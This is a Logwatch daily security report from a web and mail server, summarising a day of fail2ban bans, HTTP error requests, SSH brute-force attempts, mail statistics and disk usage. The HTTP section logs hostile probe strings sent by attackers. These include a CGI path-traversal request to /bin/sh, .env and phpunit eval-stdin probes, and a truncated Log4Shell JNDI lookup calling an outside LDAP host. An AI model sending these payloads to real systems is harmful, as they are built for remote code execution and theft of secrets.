################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sat Dec 25 04:42:04 2021
Date Range Processed: yesterday
( 2021-Dec-24 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 27:27 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
A total of 6 sites probed the server
103.156.91.51
159.223.103.30
185.196.220.54
205.185.124.100
212.192.216.31
61.219.11.151
Requests with error response codes
400 Bad Request
null: 9 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 3 Time(s)
/: 2 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 2 Time(s)
mstshash=Administr: 2 Time(s)
mstshash=Domain: 2 Time(s)
/.env: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/c/version.js: 1 Time(s)
/flu/403.html: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
HTTP/1.0: 1 Time(s)
500 Internal Server Error
/: 25 Time(s)
/robots.txt: 4 Time(s)
/.env: 3 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
//login_sid.lua: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/actuator/health: 1 Time(s)
/bag2: 1 Time(s)
/c/version.js: 1 Time(s)
/console/: 1 Time(s)
/favicon.ico: 1 Time(s)
/flu/403.html: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth.owa: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/stalker_portal/c/version.js: 1 Time(s)
/stream/live.php: 1 Time(s)
/streaming/clients_live.php: 1 Time(s)
/system_api.php: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
/~app/.env: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (129.204.143.161): 36 Time(s)
root (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 36 Time(s)
root (103.163.12.2): 35 Time(s)
root (114.113.238.195): 35 Time(s)
root (170.116.222.35.bc.googleusercontent.com): 35 Time(s)
root (213.6.203.226): 35 Time(s)
root (106.12.86.8): 34 Time(s)
root (205.214.74.6): 34 Time(s)
root (49.233.44.150): 34 Time(s)
root (91.183.81.82): 34 Time(s)
root (121.4.31.230): 32 Time(s)
root (94.200.55.38): 32 Time(s)
root (121.5.107.215): 26 Time(s)
root (203.160.55.212): 25 Time(s)
root (191.209.88.62): 19 Time(s)
root (ns3152155.ip-151-106-38.eu): 18 Time(s)
unknown (121.4.31.230): 18 Time(s)
unknown (94.200.55.38): 18 Time(s)
unknown (203.160.55.212): 17 Time(s)
root (112.216.157.26): 16 Time(s)
unknown (103.163.12.2): 15 Time(s)
unknown (114.113.238.195): 15 Time(s)
unknown (170.116.222.35.bc.googleusercontent.com): 15 Time(s)
unknown (213.6.203.226): 15 Time(s)
unknown (129.204.143.161): 14 Time(s)
unknown (49.233.44.150): 14 Time(s)
unknown (91.183.81.82): 14 Time(s)
unknown (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 14 Time(s)
unknown (106.12.86.8): 10 Time(s)
unknown (205.214.74.6): 10 Time(s)
unknown (ns3152155.ip-151-106-38.eu): 9 Time(s)
root (122.4.45.131): 7 Time(s)
root (36.37.122.43): 7 Time(s)
unknown (112.216.157.26): 7 Time(s)
root (107.189.5.248): 6 Time(s)
root (181.119.30.26): 6 Time(s)
root (199.195.248.20): 6 Time(s)
root (exitrelay31.medvideos-tor.org): 6 Time(s)
root (lux2.tor-exit-node.net): 6 Time(s)
root (tor.exit.privatemonero.org): 6 Time(s)
unknown (121.5.107.215): 6 Time(s)
unknown (191.209.88.62): 6 Time(s)
root (122.4.29.154): 5 Time(s)
root (113.120.63.219): 4 Time(s)
root (116.255.131.3): 4 Time(s)
root (221.213.129.46): 4 Time(s)
unknown (116.255.131.3): 3 Time(s)
unknown (122.4.29.154): 3 Time(s)
unknown (122.4.40.112): 3 Time(s)
unknown (36.37.122.43): 3 Time(s)
unknown (121.182.121.36): 2 Time(s)
unknown (220.71.14.244): 2 Time(s)
unknown (p54ace603.dip0.t-ipconnect.de): 2 Time(s)
mail (106.12.86.8): 1 Time(s)
root (109.230.253.146): 1 Time(s)
root (122.4.40.112): 1 Time(s)
root (211.76.125.186): 1 Time(s)
root (36.112.135.187): 1 Time(s)
root (38.91.102.46): 1 Time(s)
unknown (103.59.150.13): 1 Time(s)
unknown (104.244.76.170): 1 Time(s)
unknown (113.120.63.219): 1 Time(s)
unknown (122.4.45.131): 1 Time(s)
unknown (134.236.247.145): 1 Time(s)
unknown (141.98.10.202): 1 Time(s)
unknown (165.232.94.242): 1 Time(s)
unknown (185.90.136.69): 1 Time(s)
unknown (209.141.46.251): 1 Time(s)
unknown (221.213.129.46): 1 Time(s)
unknown (ltlkwlb.cn): 1 Time(s)
unknown (phoolandevi.tor-exit.calyxinstitute.org): 1 Time(s)
unknown (vmi668762.contaboserver.net): 1 Time(s)
Invalid Users:
Unknown Account: 248 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
3 Miscellaneous warnings
8.768K Bytes accepted 8,978
8.768K Bytes sent via SMTP 8,978
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
8 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
8 Total 4xx Rejects 100.00%
======== ==================================================
152 Connections
16 Connections lost (inbound)
152 Disconnections
1 Removed from queue
1 Sent via SMTP
1 Hostname verification errors (FCRDNS)
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin ------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End -------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 6 Time(s)
Failed logins from:
35.222.116.170 (170.116.222.35.bc.googleusercontent.com): 35 times
36.37.122.43: 7 times
36.112.135.187: 1 time
38.91.102.46 (46-102-91-38.clients.gthost.com): 1 time
49.233.44.150: 34 times
91.183.81.82 (82.81-183-91.adsl-static.isp.belgacom.be): 34 times
94.200.55.38: 32 times
103.163.12.2: 35 times
106.12.86.8: 35 times
107.189.5.248 (Luxembourg12Tor.org): 6 times
107.189.8.65 (lux2.tor-exit-node.net): 6 times
109.230.253.146: 1 time
112.216.157.26: 16 times
113.120.63.219: 4 times
114.113.238.195: 35 times
116.255.131.3: 4 times
121.4.31.230: 32 times
121.5.107.215: 26 times
122.4.29.154 (154.29.4.122.broad.jn.sd.dynamic.163data.com.cn): 5 times
122.4.40.112 (112.40.4.122.broad.jn.sd.dynamic.163data.com.cn): 1 time
122.4.45.131 (131.45.4.122.broad.jn.sd.dynamic.163data.com.cn): 7 times
129.204.143.161: 36 times
151.106.38.100 (ns3152155.ip-151-106-38.eu): 18 times
161.189.131.226 (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 36 times
181.119.30.26 (host26.181.119.30.baehost.com.ar): 6 times
191.209.88.62 (191-209-88-62.user.vivozap.com.br): 19 times
199.195.248.20: 6 times
203.160.55.212: 25 times
205.185.115.207 (exitrelay31.medvideos-tor.org): 6 times
205.214.74.6 (205.214.74-6.static.data393.net): 34 times
209.141.45.215 (tor.exit.privatemonero.org): 6 times
211.76.125.186 (211-76-125-186.static.kbronet.com.tw): 1 time
213.6.203.226: 35 times
221.213.129.46: 4 times
Illegal users from:
2001:470:1:332::7: 1 time
undef: 161 times
35.222.116.170 (170.116.222.35.bc.googleusercontent.com): 15 times
36.37.122.43: 3 times
43.134.92.159: 1 time
49.233.44.150: 14 times
65.49.20.69 (scan-20.shadowserver.org): 1 time
84.172.230.3 (p54ace603.dip0.t-ipconnect.de): 2 times
91.183.81.82 (82.81-183-91.adsl-static.isp.belgacom.be): 14 times
94.200.55.38: 18 times
103.59.150.13: 1 time
103.163.12.2: 15 times
104.244.76.170 (tor2.panhu.xyz): 1 time
106.12.86.8: 10 times
112.216.157.26: 7 times
113.120.63.219: 1 time
114.113.238.195: 15 times
116.255.131.3: 3 times
121.4.31.230: 18 times
121.5.107.215: 6 times
121.182.121.36: 2 times
122.4.29.154 (154.29.4.122.broad.jn.sd.dynamic.163data.com.cn): 3 times
122.4.40.112 (112.40.4.122.broad.jn.sd.dynamic.163data.com.cn): 3 times
122.4.45.131 (131.45.4.122.broad.jn.sd.dynamic.163data.com.cn): 1 time
129.204.143.161: 14 times
134.236.247.145: 1 time
141.98.10.202: 1 time
151.106.38.100 (ns3152155.ip-151-106-38.eu): 9 times
161.97.89.132 (vmi668762.contaboserver.net): 1 time
161.189.131.226 (ec2-161-189-131-226.cn-northwest-1.compute.amazonaws.com.cn): 14 times
162.247.74.216 (phoolandevi.tor-exit.calyxinstitute.org): 1 time
165.232.94.242: 1 time
185.90.136.69 (ksort-fi41-sort.betmam.com): 1 time
191.209.88.62 (191-209-88-62.user.vivozap.com.br): 6 times
203.160.55.212: 17 times
205.185.125.184 (ltlkwlb.cn): 1 time
205.214.74.6 (205.214.74-6.static.data393.net): 10 times
209.141.46.251: 1 time
213.6.203.226: 15 times
220.71.14.244: 2 times
221.213.129.46: 1 time
**Unmatched Entries**
error: Received disconnect from 109.230.253.146: 3: com.jcraft.jsch.JSchException: Auth fail [preauth] : 1 time(s)
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################